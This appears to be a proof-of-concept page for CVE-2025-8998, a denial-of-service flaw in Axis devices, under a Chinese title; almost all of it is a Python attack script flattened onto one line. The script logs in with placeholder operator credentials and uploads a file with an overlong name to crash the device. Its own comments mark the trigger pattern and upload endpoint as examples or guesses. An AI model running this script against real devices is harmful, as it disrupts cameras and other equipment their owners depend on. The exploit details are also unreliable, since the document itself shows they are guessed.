CVE-2025-8998: Axis设备文件上传导致拒绝服务漏洞

# CVE-2025-8998 PoC - File Upload leading to DoS # Requires valid operator/administrator credentials import requests import sys TARGET = "http://target-device.local" USERNAME = "operator" PASSWORD = "password" def exploit(): """Upload file with specific name to trigger crash""" session = requests.Session() # Authentication login_url = f"{TARGET}/axis-cgi/pwdgrp.cgi" auth_data = { "user": USERNAME, "password": PASSWORD } session.post(login_url, data=auth_data) # Craft malicious filename to trigger vulnerability # The specific filename pattern triggers the DoS condition malicious_filename = "a" * 500 + ".tmp" # Example trigger pattern # File upload endpoint (typical Axis upload endpoint) upload_url = f"{TARGET}/axis-cgi/upload.cgi" files = { "file": (malicious_filename, b"A" * 1000, "application/octet-stream") } try: response = session.post(upload_url, files=files, timeout=10) print(f"Upload response: {response.status_code}") print("Check if service is still responsive...") except requests.exceptions.RequestException as e: print(f"Request failed (service may be crashed): {e}") if __name__ == "__main__": exploit()